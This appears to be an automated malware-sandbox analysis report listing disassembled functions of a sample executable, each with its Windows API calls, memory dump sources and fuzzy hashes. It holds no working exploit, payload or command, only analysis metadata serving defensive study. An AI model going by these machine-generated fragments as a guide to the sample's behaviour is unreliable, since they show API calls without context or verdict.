                                                                                                                • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                                                • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                                                Function 00445719 Relevance: 6.1, APIs: 4, Instructions: 76windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 00445721
                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2796087071-0
                                                                                                                • Opcode ID: 07a683c3f77dae50ee773e7e3fa5154241049f7b31449e9a489b3be5124be6a3
                                                                                                                • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                                                • Opcode Fuzzy Hash: 07a683c3f77dae50ee773e7e3fa5154241049f7b31449e9a489b3be5124be6a3
                                                                                                                • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                                                Function 0047721A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                • String ID:
                                                                                                                • API String ID: 2169480361-0
                                                                                                                • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                                • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                                Function 00448C8B Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32 ref: 00448CB8
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 312131281-0
                                                                                                                • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                                                • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                                                Function 004588B0 Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • select.WSOCK32 ref: 0045890A
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                                                • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastacceptselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 385091864-0
                                                                                                                • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                                                • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                                                Function 00438D4E Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                                • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                                Function 0043362D Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1358664141-0
                                                                                                                • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                                • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                                                Function 0044419B Relevance: 6.1, APIs: 4, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 2880819207-0
                                                                                                                • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                                • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                                Function 0043401C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                                • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 357397906-0
                                                                                                                • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                                • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                                                Function 004555D6 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeleteDestroyObject$IconWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3349847261-0
                                                                                                                • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                                                • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                                                Function 0044B600 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                • String ID:
                                                                                                                • API String ID: 2223660684-0
                                                                                                                • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                                                • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                                                Function 00447268 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                                                • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                                                • EndPath.GDI32(?), ref: 004472B0
                                                                                                                • StrokePath.GDI32(?), ref: 004472BE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 2783949968-0
                                                                                                                • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                                                • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                                                Function 00471144 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDesktopWindow.USER32 ref: 00471144
                                                                                                                • GetDC.USER32(00000000), ref: 0047114D
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                                                • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                                                Function 00471102 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDesktopWindow.USER32 ref: 00471102
                                                                                                                • GetDC.USER32(00000000), ref: 0047110B
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                                                • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                                                Function 004389A1 Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2710830443-0
                                                                                                                • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                                                • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                                                Function 004390C2 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                                                  • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                                                  • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
